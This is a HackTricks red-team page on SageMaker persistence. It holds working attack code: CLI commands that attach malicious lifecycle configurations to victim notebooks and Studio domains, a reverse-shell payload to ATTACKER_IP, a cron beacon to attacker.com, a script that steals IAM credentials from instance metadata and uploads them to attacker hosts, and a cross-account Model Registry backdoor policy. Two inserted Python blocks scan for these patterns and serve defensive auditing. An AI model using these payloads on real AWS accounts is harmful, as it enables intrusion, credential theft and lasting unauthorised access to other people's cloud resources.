AWS - SageMaker Persistence
Reading time: 7 minutes
tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Persistence Techniques Overview
This section describes ways to obtain persistence in SageMaker by abusing Lifecycle Configurations (LCCs), including reverse shells, cron jobs, credential theft via IMDS, and SSH backdoors. These scripts run under the instance's IAM role and can survive restarts. Most techniques require outbound network access, but leveraging services on the AWS control plane may still succeed if the environment is in 'VPC-only' mode.
tip
Note: SageMaker notebook instances are essentially managed EC2 instances purpose-built for machine learning workloads.
Required Permissions
- Notebook Instances:
  - sagemaker:CreateNotebookInstanceLifecycleConfig
  - sagemaker:UpdateNotebookInstanceLifecycleConfig
  - sagemaker:CreateNotebookInstance
  - sagemaker:UpdateNotebookInstance
- Studio Apps:
  - sagemaker:CreateStudioLifecycleConfig
  - sagemaker:UpdateStudioLifecycleConfig
  - sagemaker:UpdateUserProfile
  - sagemaker:UpdateSpace
  - sagemaker:UpdateDomain
Attach a Lifecycle Configuration to Notebook Instances
Example AWS CLI commands:
```bash
# Create Lifecycle Configuration
aws sagemaker create-notebook-instance-lifecycle-config \
  --notebook-instance-lifecycle-config-name attacker-lcc \
  --on-start Content=$(base64 -w0 reverse_shell.sh)

# Attach Lifecycle Configuration to Notebook Instance
aws sagemaker update-notebook-instance \
  --notebook-instance-name victim-instance \
  --lifecycle-config-name attacker-lcc
```
Attach a Lifecycle Configuration to SageMaker Studio
Lifecycle Configurations can be attached at several levels and to different app types within SageMaker Studio.
Studio Domain Level (All Users)
```bash
# Create Studio Lifecycle Configuration
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-studio-lcc \
  --studio-lifecycle-config-app-type JupyterServer \
  --studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)

# Apply LCC to entire Studio Domain
aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
  "JupyterServerAppSettings": {
    "DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
  }
}'
```
Studio Space Level (Private or Shared Spaces)
```bash
# Update SageMaker Studio Space to attach LCC
aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
  "JupyterServerAppSettings": {
    "DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
  }
}'
```
Studio Application Lifecycle Configuration Types
Lifecycle configurations can be applied specifically to different SageMaker Studio application types:
- JupyterServer: Runs scripts when the Jupyter server starts; best suited for persistence techniques such as reverse shells and cron jobs.
- KernelGateway: Executes when a kernel gateway app is launched; useful for initial setup or persistent access.
- CodeEditor: Applies to the Code Editor (Code-OSS), allowing scripts to run when code-editing sessions start.
Example command for each type:
JupyterServer
```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-jupyter-lcc \
  --studio-lifecycle-config-app-type JupyterServer \
  --studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
```
KernelGateway
```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-kernelgateway-lcc \
  --studio-lifecycle-config-app-type KernelGateway \
  --studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
```
CodeEditor
```bash
aws sagemaker create-studio-lifecycle-config \
  --studio-lifecycle-config-name attacker-codeeditor-lcc \
  --studio-lifecycle-config-app-type CodeEditor \
  --studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
```
Important notes:
- Applying LCCs at the domain or space level affects every user or application within that scope.
- This requires elevated permissions (sagemaker:UpdateDomain, sagemaker:UpdateSpace) and is usually easier to pull off at the space level than at the domain level.
- Network-level controls (e.g., strict egress filtering) can prevent reverse shells from connecting back or data from being exfiltrated.
Reverse Shell via Lifecycle Configuration
SageMaker Lifecycle Configurations (LCCs) run custom scripts when notebook instances start. An attacker with the required permissions can establish a persistent reverse shell.
Payload example:
```bash
#!/bin/bash
ATTACKER_IP="<ATTACKER_IP>"
ATTACKER_PORT="<ATTACKER_PORT>"
nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
```
Cron Job Persistence via Lifecycle Configuration
An attacker can inject cron jobs through LCC scripts, ensuring periodic execution of malicious scripts or commands and thus enabling stealthy persistence.
Payload example:
```bash
#!/bin/bash
PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
CRON_JOB="*/30 * * * * $CRON_CMD"
mkdir -p /home/ec2-user/SageMaker/.local_tasks
echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
chmod +x $PAYLOAD_PATH
(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -
```
Credential Exfiltration via IMDS (v1 & v2)
Lifecycle configurations can query the Instance Metadata Service (IMDS) to obtain IAM credentials and send them to an attacker-controlled location.
Payload example:
```bash
#!/bin/bash
ATTACKER_BUCKET="s3://attacker-controlled-bucket"
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json

# Exfiltrate via S3
aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json

# Alternatively, exfiltrate via HTTP POST
curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
```
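From the defender's side, every LCC payload shown in the sections above ends up stored base64-encoded in the SageMaker API, so the whole fleet of lifecycle configurations can be pulled and scanned for these patterns. The following Python is an added audit example, not code from the original page or from AWS: the indicator rules, function names and sample scripts are my own constructions (labelled hypothetical in the comments), while the boto3 calls are the real SageMaker List/Describe operations and need credentials, so the offline demo only exercises the scanner on constructed samples.

```python
import base64
import re

# Hypothetical indicator rules modelled on the LCC payload patterns described on this page;
# a starting point for triage, not an exhaustive signature set.
INDICATORS = {
    "reverse_shell": re.compile(r"/dev/tcp/|\bnc\s+-e\b|bash\s+-i\s*>&"),
    "imds_query": re.compile(r"169\.254\.169\.254|X-aws-ec2-metadata-token"),
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron\."),
    "http_post_exfil": re.compile(r"curl\s.*-X\s+POST|curl\s.*-F\s+['\"]?file=@"),
    "s3_copy": re.compile(r"aws\s+s3\s+(cp|sync)\s"),
}


def scan_lcc_content(name, b64_content):
    """Decode an LCC script (the API returns it base64-encoded) and list the indicators it matches."""
    script = base64.b64decode(b64_content).decode("utf-8", errors="replace")
    hits = sorted(key for key, rx in INDICATORS.items() if rx.search(script))
    return {"name": name, "hits": hits}


def audit_lifecycle_configs(region_name):
    """Fetch every notebook-instance and Studio LCC with boto3 and return those with hits (needs credentials)."""
    import boto3  # imported here so scan_lcc_content works without boto3 installed
    sm = boto3.client("sagemaker", region_name=region_name)
    findings = []
    for page in sm.get_paginator("list_notebook_instance_lifecycle_configs").paginate():
        for item in page["NotebookInstanceLifecycleConfigs"]:
            name = item["NotebookInstanceLifecycleConfigName"]
            cfg = sm.describe_notebook_instance_lifecycle_config(NotebookInstanceLifecycleConfigName=name)
            for hook in ("OnCreate", "OnStart"):  # both hooks can carry a script
                for entry in cfg.get(hook, []):
                    findings.append(scan_lcc_content(f"notebook:{name}/{hook}", entry["Content"]))
    for page in sm.get_paginator("list_studio_lifecycle_configs").paginate():
        for item in page["StudioLifecycleConfigs"]:
            name = item["StudioLifecycleConfigName"]
            cfg = sm.describe_studio_lifecycle_config(StudioLifecycleConfigName=name)
            findings.append(scan_lcc_content(f"studio:{name}", cfg["StudioLifecycleConfigContent"]))
    return [f for f in findings if f["hits"]]


# Constructed samples for an offline run: two modelled on this page's payloads, one benign.
SAMPLE_REVERSE_SHELL = base64.b64encode(
    b'#!/bin/bash\nATTACKER_IP="<ATTACKER_IP>"\nnohup bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1 &\n').decode()
SAMPLE_IMDS_EXFIL = base64.b64encode(
    b'TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token")\naws s3 cp /tmp/creds.json s3://example/\n').decode()
SAMPLE_BENIGN = base64.b64encode(
    b"#!/bin/bash\nsudo -u ec2-user -i <<EOF\nsource activate python3\npip install pandas\nEOF\n").decode()
```

Run `audit_lifecycle_configs("us-east-1")` with read-only SageMaker credentials to get the flagged configurations; a CloudTrail alert on CreateNotebookInstanceLifecycleConfig, CreateStudioLifecycleConfig, UpdateDomain and UpdateSpace complements the scan with change detection.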
Persistence via Model Registry resource policy (PutModelPackageGroupPolicy)
Abuse the resource-based policy on a SageMaker Model Package Group to grant an external principal cross-account rights (e.g., CreateModelPackage/Describe/List). This creates a durable backdoor that allows pushing poisoned model versions or reading model metadata/artifacts even if the attacker's IAM user/role in the victim account is deleted.
Required permissions
- sagemaker:CreateModelPackageGroup
- sagemaker:PutModelPackageGroupPolicy
- sagemaker:GetModelPackageGroupPolicy
Steps (us-east-1)
```bash
# 1) Create a Model Package Group
REGION=${REGION:-us-east-1}
MPG=atk-mpg-$(date +%s)
aws sagemaker create-model-package-group \
  --region "$REGION" \
  --model-package-group-name "$MPG" \
  --model-package-group-description "Test backdoor"

# 2) Craft a cross-account resource policy (replace 111122223333 with attacker account)
cat > /tmp/mpg-policy.json <<JSON
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowCrossAccountCreateDescribeList",
      "Effect": "Allow",
      "Principal": {"AWS": ["arn:aws:iam::111122223333:root"]},
      "Action": [
        "sagemaker:CreateModelPackage",
        "sagemaker:DescribeModelPackage",
        "sagemaker:DescribeModelPackageGroup",
        "sagemaker:ListModelPackages"
      ],
      "Resource": [
        "arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package-group/${MPG}",
        "arn:aws:sagemaker:${REGION}:<VICTIM_ACCOUNT_ID>:model-package/${MPG}/*"
      ]
    }
  ]
}
JSON

# 3) Attach the policy to the group
aws sagemaker put-model-package-group-policy \
  --region "$REGION" \
  --model-package-group-name "$MPG" \
  --resource-policy "$(jq -c . /tmp/mpg-policy.json)"

# 4) Retrieve the policy (evidence)
aws sagemaker get-model-package-group-policy \
  --region "$REGION" \
  --model-package-group-name "$MPG" \
  --query ResourcePolicy --output text
```
Notes
- For a real cross-account backdoor, set Resource to the specific group ARN and use the attacker's AWS account ID in the Principal.
- For end-to-end cross-account execution or artifact reads, align the S3/ECR/KMS permissions with the attacker account.
Impact
- Durable cross-account control of the Model Registry group: the attacker can publish malicious model versions or list/read model metadata even after their IAM entities are removed from the victim account.
Canvas cross-account model registry backdoor (UpdateUserProfile.ModelRegisterSettings)
Abuse SageMaker Canvas user settings to silently redirect model registry writes to an attacker-controlled account by enabling ModelRegisterSettings and pointing CrossAccountModelRegisterRoleArn at an attacker role in another account.
Required permissions
- sagemaker:UpdateUserProfile on the target UserProfile
- Optional: sagemaker:CreateUserProfile on a Domain you control
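Both registry backdoors above, the Model Package Group resource policy and the Canvas CrossAccountModelRegisterRoleArn, share one detection: every principal or role ARN must resolve to an account you expect. The following Python is an added audit helper, not code from the original page or from AWS. The account IDs, policy and user settings are constructed samples in the shape this page shows; in practice the inputs come from get-model-package-group-policy (ResourcePolicy, a JSON string) and describe-user-profile (UserSettings).

```python
import json
import re

ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:iam::(\d{12}):")  # account ID in an IAM ARN, any partition


def principal_accounts(principal):
    """Return the account IDs named in a policy Principal; a wildcard is returned as '*'."""
    values = ["*"] if principal == "*" else principal.get("AWS", []) if isinstance(principal, dict) else []
    values = [values] if isinstance(values, str) else values
    accounts = set()
    for value in values:
        if value == "*" or (value.isdigit() and len(value) == 12):
            accounts.add(value)  # wildcard or bare account ID
        elif m := ARN_ACCOUNT.match(value):
            accounts.add(m.group(1))
    return accounts


def foreign_principals(policy_json, own_account):
    """(Sid, account) pairs for Allow statements whose Principal lies outside own_account."""
    findings = []
    for st in json.loads(policy_json).get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        for acct in sorted(principal_accounts(st.get("Principal", {}))):
            if acct != own_account:
                findings.append((st.get("Sid", ""), acct))
    return findings


def canvas_register_role_account(user_settings):
    """Account of CrossAccountModelRegisterRoleArn when Canvas model registration is ENABLED, else None."""
    mrs = user_settings.get("CanvasAppSettings", {}).get("ModelRegisterSettings", {})
    if mrs.get("Status") != "ENABLED":
        return None
    m = ARN_ACCOUNT.match(mrs.get("CrossAccountModelRegisterRoleArn", ""))
    return m.group(1) if m else None


# Constructed samples: the policy shape shown on this page and a Canvas profile pointing elsewhere.
VICTIM_ACCOUNT = "123456789012"  # placeholder for the audited account
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{
    "Sid": "AllowCrossAccountCreateDescribeList", "Effect": "Allow",
    "Principal": {"AWS": ["arn:aws:iam::111122223333:root"]},
    "Action": ["sagemaker:CreateModelPackage", "sagemaker:ListModelPackages"],
    "Resource": f"arn:aws:sagemaker:us-east-1:{VICTIM_ACCOUNT}:model-package-group/example"}]})
SAMPLE_USER_SETTINGS = {"CanvasAppSettings": {"ModelRegisterSettings": {
    "Status": "ENABLED", "CrossAccountModelRegisterRoleArn": "arn:aws:iam::111122223333:role/ExampleRole"}}}
```

Any account returned by either function that is not yours (or a wildcard) is a finding; pairing this with CloudTrail alerts on PutModelPackageGroupPolicy and UpdateUserProfile catches the change as it happens.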